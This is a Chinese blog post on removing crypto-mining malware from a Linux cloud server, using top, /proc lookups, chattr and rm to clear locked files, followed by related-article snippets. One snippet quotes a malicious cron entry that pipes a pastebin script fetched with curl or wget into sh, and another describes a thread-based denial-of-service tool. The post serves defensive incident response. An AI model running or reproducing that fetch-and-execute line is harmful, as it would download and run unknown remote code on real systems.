云服务出现占用CPU-90%的恶意命令

最新推荐文章于 2021-03-14 21:42:57 发布

山沉

最新推荐文章于 2021-03-14 21:42:57 发布

阅读量903

点赞数 1

分类专栏： LInux

本文链接：https://blog.csdn.net/qq_43925043/article/details/107852506

版权

LInux 专栏收录该内容

0 篇文章 0 订阅

订阅专栏

云服务提供的信息

avator

先查看进程，选择top命令，查看结果：

avator

CPU占用率达到100%，且不是我执行的命令，果断找出执行路径。使用如下命令，通过 PID 获取对应文件的路径。然后，找到并删除对应的文件。

ls -l /proc/$pid/exe

这里的pid，我这里是14560。找到路径，删除命令或者文件。若存在恶意 minerd、tplink 进程，也查找出来删除。

avator

下面用的命令是进行删除出现这个提示的命令或文件：

cannot remove ‘phpupdate’: Operation not permitted

可以使用以下命令去删除文件

lsattr 文件/命令  --查看隐藏属性
chattr 隐藏属性 文件/命令
rm -rf 文件/命令  -- 重新执行删除

avator

最后在重新查看，进程，是否有类似很高的进程，又不是你自己的。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

山沉

关注关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Rsh.rar_CPU 内存网络

09-22

例如，对CPU占用高的进程进行优先级调整，或者限制某些应用的内存使用。 7. **故障预防**：定期的性能监控能够提前发现潜在问题，避免突发故障对业务造成影响。通过历史数据的趋势分析，可以预测未来可能出现的性能...

云服务器内存占用多少,腾讯云云服务器CPU或内存占用过高怎么办？

weixin_33613571的博客

07-30

2776

简介本文档介绍因云服务器CPU或内存占用过高，导致无法登录Windows和Linux云服务器实例的排查方法和解决方案。排查思路1.登录实例定位消耗CPU或内存的具体进程。2.对CPU或内存占用率高的进程进行分析。·如果是异常进程，可能是病毒或木马导致，您可以自行终止进程，或者使用安全软件进行查杀。·如果是业务进程，则需要分析是否由于访问量变化引起，是否存在优化空间。·如果是腾讯云组件进程，请提交工...

参与评论您还未登录，请先登录后发表或查看评论

阿里云服务器养只大虫子：Redis漏洞挖矿造成CPU100%的解决办法

Sail__的专栏

01-17

3833

之前在9月份的时候，我的阿里云服务器出现过一次被挖矿的情况，也是cpu爆满，后来发现是因为mysql的漏洞。当时抓着mysql一顿处理，新建用户，强密码，设权限，nologin，可算是正常了。这几天又再次出现了被挖矿的情况，今天算是解决了，舒服，下面说下情况。表现：服务器上的web应用一场的慢，ssh登陆进去top -c查看如下： COMMAN处的[UWcUml]占用cpu100...

记一次阿里云linux服务器中毒处理

九韭酒的博客

11-18

2032

记一次阿里云linux服务器中毒处理事件定位进程人肉筛查clamav来源参考事件阿里云告警：您的云服务器（XXXXX）由于被检测到对外攻击，已阻断该服务器对其它服务器端口（XXX）的访问，阻断预计将在XXXXXX时间内结束，请及时进行安全自查。登录服务器（Ubuntu 16.04.4 LTS），发现CPU满载，docker下的jekins各种重启。定位进程 top命令，发现CPU占用...

记一次解决挖矿病毒的过程（sysupdate、networkservice）

p312011150的博客

07-07

3133

对于挖矿病毒，我们如何发现它呢？其实有个很显然的问题，挖矿病毒会超级占用cpu，当你发现你的服务器变的很卡的时候，这时候，可能就是挖矿病毒或者其他病毒正在攻击你的服务器。我也是有一段时间服务器变的很卡，那时我还以为是我自己的软件装太多导致的问题，不看不知道，看了吓一跳，服务器已经被攻击了，接下来，我来分享下如何查找和解决这个病毒。一、找出病毒当发现服务器卡的时候，我们可以采用top命令，如下显示 image.png 我们注意看以上这几个进程，没稍加注意的话，我们还以为这几个是正..

OVH API scripts (bugkillers.eu)-开源

04-24

2. 实时监控：能够实时获取 OVH 服务的状态信息，如 CPU 使用率、内存占用、网络流量等。 3. 安全增强：通过 "block_AnonymousSurfing" 模块，可以提高网站安全性，防止 DDoS 攻击和其他恶意活动。 4. 故障恢复：在...

Java-Denial-Of-Service:使用线程拒绝服务

05-31

在DoS攻击中，攻击者可能会创建大量线程，快速占用目标系统的CPU和内存资源，导致系统性能急剧下降，甚至崩溃。参数`-threads`可能用于指定要创建的线程数量，以此控制攻击的强度。其次，套接字（Socket）是Java...

网络游戏-游戏的监控报警方法和设备.zip

09-20

2. **性能指标监控**：监控系统需要关注游戏服务器的CPU使用率、内存占用、磁盘I/O等关键性能指标，一旦超过预设阈值，应立即触发报警，以便运维人员采取措施避免服务中断。 3. **异常检测**：游戏中的异常行为可能...

基于云计算机的虚拟化技术分析.pdf

07-18

3. 操作系统的保护：操作系统的安全防护是虚拟化环境中的一个关键环节，需要提供高级别的安全防护，并且在出现病毒或恶意软件入侵时及时处理。虚拟化技术的发展和应用，已经对信息科技领域产生了深远的影响，它...

windows下查找java应用占用CPU过高问题

热门推荐

ningzuobei的专栏

09-30

1万+

最近在测试一个用java语言实现的数据采集接口时发现，接口一旦运行起来，CPU利用率瞬间飙升到85%-95%，一旦停止就恢复到40%以下，这让我不得不面对以前从未关注过的程序性能问题。在硬着头皮查找资料定位错误修正bug的过程中参考了下面两篇文章： windows下揪出java程序占用cpu很高的线程并找到问题代码死循环线程代码：http://blog.csdn.net/hexin373

阿里云CPU占用率90%被植入挖矿木马的解决方法

qq_35692642的博客

03-14

4680

目录问题总结问题最近几日突然发现服务器CPU占用率满了我一开始还没在意，但是当打开警告内容的时候心脏骤停查了一下，发现应该是被别人植入木马挖矿了，使用top命令看了一下CPU占用，发现有个python进程cpu占用率直接拉满，而且总是定时启动，没法直接使用kill杀死进程使用 vim /var/log/cron 查看了一下计划任务，果然不对劲但是使用crontab -l查看，什么也没有网上查了一下，发现可能是木马可能是从6379端口进来的，使用lsof -i:6379看了一下，几百

关于杀掉linux中的php进程

qdujunjie的专栏

12-22

1万+

[wz@supportserver-51 jd]$ ps -ef | grep pure-ftpd | grep -v grep | awk '{print $2" "$3}' | xargs kill -9 = pkill php kill: can't find process "=" kill: can't find process "pkill" [2] Killed

查找CPU占用率达到100%的原因

boshuzhang的专栏

03-28

6431

查找CPU占用率达到100%的原因　　最近运行服务器程序，发现某个进程CPU占用率超过100%，有些奇怪，该进程功能很简单，主要是用来接受客户端请求，根据一些算法选择gate服务器，我们逻辑功能都是写在脚本层，我查看了该进程脚本层代码，比较简单，没有使用while循环，那问题肯定是在C++底层上，就决定调试下，步骤如下。 1、查找进程id，使用ps命令，截图如下：发现

阿里云服务器cpu 100% 问题处理

云飞的博客

04-18

7096

阿里云服务器CPU 100%，但使用top命令查看却找不到相关进程。执行crontab -l 查看，发现多了一条定时任务 */23 * * * * (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh 手动执行curl -fsSL https://p...

如何排查CPU占用过高以及常见的几种情况

二营长

04-22

4614

在最近上线过程中遇到cpu占用率过高问题由于问题已解决,此时仅重现操作方法 1.先用top命令,找到cpu占用最高的进程 PID 2.再用ps -mp pid -o THREAD,tid,time 查询pid进程中,那个线程的cpu占用率高记住TID 3.jstack 29099 >> xxx.log 打印出29099该进程下线程日志 4.将xxx.log 日志文件下载到本...

阿里云上服务器被侵入，占用大量cpu解决办法

Lemon_MY的博客

07-02

1851

原因：利用redis漏洞侵入，植入木马程序。解决：cat /var/spool/cron/root发现被写入自动下载代码，lsattr /var/spool/cron/root查看文件被修改的权限，chattr -isa /var/spool/cron/root去掉权限，vim /var/spool/cron/root去掉代码，wq保存退出。使用top命令查看占用cpu的程序及其pid号，ps -ef|grep pid号查找到程序位置，chattr -i 去掉权限，然后rm -rf删除文件。注意：漏洞是

阿里云服务器CPU跑满或抛高及带宽跑满怎样排查分析原因？（图文教程）

tianjinsong的专栏

09-18

1万+

https://www.wanweiwang.cn/FAQ/view/884.html 如果您使用阿里云云服务器 ECS 时，若出现服务的速度变慢，或 ECS 实例突然断开，可以考虑服务器带宽和 CPU 是否有跑满或跑高的问题。Linux 系统下，您可以按如下步骤进行排查：定位问题。找到影响带宽和 CPU 跑满或跑高的具体进程。分析处理。排查影响带宽和 CPU 跑满或跑高的进...

cr2.sh和phpupdate.out挖矿程序处理

一杯咖啡的渗透记忆

07-08

1084

已经有很长一段没有处理阿里云的预警问题了，最近同事因个人事务请假，我接手了他的任务，阿里预警： 1. 确定文件路径： [test@test /]$ sudo find / -name *phpupdate* find: ‘/proc/21471’: No such file or directory /data2/hadoop/tmp/nm-local-dir/usercache/devops/appcache/application_1588995900644_0004/contai

Windows Server 2012云服务配置与Hyper-V实战

"该文档是关于在Windows Server 2012上配置云服务和使用Hyper-V的详细指南，涵盖了从基础理论到实践操作的多个方面。" 在Windows Server 2012中配置云服务涉及到对云计算基本原理的理解，包括云计算的转型、来源...